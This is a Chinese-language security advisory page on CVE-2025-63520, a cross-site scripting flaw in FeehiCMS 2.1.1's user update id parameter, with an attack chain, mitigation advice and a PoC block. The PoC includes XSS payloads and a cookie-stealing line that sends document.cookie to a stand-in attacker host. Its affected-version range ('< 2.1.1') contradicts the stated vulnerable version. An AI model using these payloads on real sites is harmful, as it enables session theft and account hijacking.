IPBUF安全漏洞报告
English
CVE-2025-63520 CVSS 6.1 中危

CVE-2025-63520 FeehiCMS 2.1.1用户更新功能跨站脚本(XSS)漏洞

披露日期: 2025-12-01

漏洞信息

漏洞编号
CVE-2025-63520
漏洞类型
XSS
CVSS评分
6.1 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
FeehiCMS

相关标签

XSS跨站脚本攻击FeehiCMSCVE-2025-63520内容管理系统存储型XSSWeb安全漏洞

漏洞概述

CVE-2025-63520是FeehiCMS 2.1.1版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于用户更新功能(User Update Function)中,具体通过id参数进行注入。攻击者可以利用此漏洞在受害者的浏览器中执行任意JavaScript代码,从而窃取会话令牌、劫持用户账户、修改页面内容或进行钓鱼攻击。由于该漏洞无需认证即可利用(PR:N),但需要用户交互(UI:R),因此攻击者需要诱导已登录用户访问恶意构造的链接。CVSS评分6.1属于中等严重程度,主要影响系统的机密性和完整性。FeehiCMS是一款基于PHP开发的内容管理系统,广泛应用于企业网站和个人博客。该XSS漏洞的存在可能导致大量用户数据泄露和网站声誉受损。建议相关用户及时关注官方安全公告并采取相应的修复措施。

技术细节

该漏洞属于存储型XSS(Stored XSS)漏洞,攻击者通过构造恶意Payload注入到FeehiCMS 2.1.1的用户更新功能中。具体攻击向量为URL参数id,即(?r=user%2Fupdate)页面中的id参数。攻击者可以在id参数中注入JavaScript代码,当管理员或其他用户访问包含恶意代码的页面时,注入的脚本将在其浏览器上下文中执行。由于该参数在数据库中存储后未进行充分的输入验证和输出编码,恶意脚本会被永久保存在系统中,影响所有访问该页面的用户。攻击者通常利用此漏洞窃取Cookie中的会话令牌,进而冒充合法用户进行操作。漏洞利用前提是目标用户已登录系统且访问了攻击者构造的恶意链接。在CVSS 3.1评分体系中,该漏洞的攻击向量为网络(AV:N),攻击复杂度低(AC:L),无需权限(PR:N),但需要用户交互(UI:R)。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标网站使用的FeehiCMS版本,确认是否为2.1.1版本,并定位用户更新功能的URL路径(?r=user%2Fupdate)
STEP 2
步骤2: Payload构造
攻击者构造恶意XSS Payload,如<script>alert(document.cookie)</script>,并尝试在id参数中进行注入测试
STEP 3
步骤3: 诱骗用户
攻击者通过钓鱼邮件、社交工程或其他方式诱导已登录的管理员或用户访问包含恶意Payload的链接
STEP 4
步骤4: 脚本执行
当受害用户访问恶意链接时,注入的JavaScript代码在其浏览器上下文中执行,可窃取会话Cookie或执行其他恶意操作
STEP 5
步骤5: 账户劫持
攻击者利用窃取的会话令牌冒充合法用户,登录系统进行未授权操作,如修改数据、窃取敏感信息等

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2025-63520 PoC - FeehiCMS 2.1.1 XSS via id parameter --> <!-- Target: FeehiCMS 2.1.1 User Update Function --> <!-- URL: ?r=user%2Fupdate&id=<payload> --> <!-- Basic XSS Payload --> <script>alert(document.cookie)</script> <!-- Cookie Stealing Payload --> <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Example Attack URL --> <!-- https://target.com/?r=user%2Fupdate&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E --> <!-- HTML Entity Encoded Variant --> &#x3C;script&#x3E;alert(document.cookie)&#x3C;/script&#x3E; <!-- Image Tag Event Handler Variant --> <img src=x onerror=alert(document.domain)>

影响范围

FeehiCMS < 2.1.1

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时缓解措施:1)使用Web应用防火墙拦截包含XSS特征的请求;2)对用户输入进行严格的HTML实体编码;3)启用浏览器的XSS过滤器;4)限制用户更新功能的访问权限;5)监控日志中的可疑请求;6)考虑暂时禁用受影响的用户更新功能。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表